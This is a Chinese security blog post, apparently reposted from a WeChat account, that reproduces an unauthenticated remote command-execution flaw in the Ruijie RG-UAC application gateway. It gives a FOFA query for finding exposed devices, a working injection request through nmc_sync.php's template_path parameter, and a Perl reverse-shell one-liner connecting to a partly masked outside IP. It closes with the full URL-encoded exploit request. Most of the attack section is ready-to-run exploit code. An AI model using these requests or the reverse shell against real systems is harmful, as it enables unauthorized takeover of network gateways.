锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战

admin 2023年12月10日09:06:51评论138 views字数 1826阅读6分5秒阅读模式

0x01 漏洞概述

锐捷RG-UAC应用管理网关nmc_sync.php接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。

0x02 复现环境

FOFA:app="Ruijie-RG-UAC"
锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战

0x03 漏洞复现

POC:
GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip
锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战

验证

GET /view/systemConfig/management/test.txt HTTP/1.1Host: your-ipAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战

0x04 反弹shell

安全设备的Linux很多命令是没有的,经过测试后发现只有Perl能反弹shell,在 https://revshells.isisy.com 网站生成Perl的反弹shell

原始的反弹shell如下,在BurpSuite中需要URL编码,方法是选中,然后Ctrl+U快捷键编码即可。
perl -e 'use Socket;$i="121.*.***.*";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战

最终使用Perl反弹shell的POC如下:

GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|perl+-e+'use+Socket%3b$i%3d"121.*.***.*"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b' HTTP/1.1Host: ***.**.***.**:****User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=c73e6c1766d9a1173ac820cb22dad128Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1

原文始发于微信公众号(潇湘信安):锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月10日09:06:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   锐捷RG-UAC应用网关-前台RCE漏洞复现反弹shell实战http://cn-sec.com/archives/2284248.html

发表评论

匿名网友 填写信息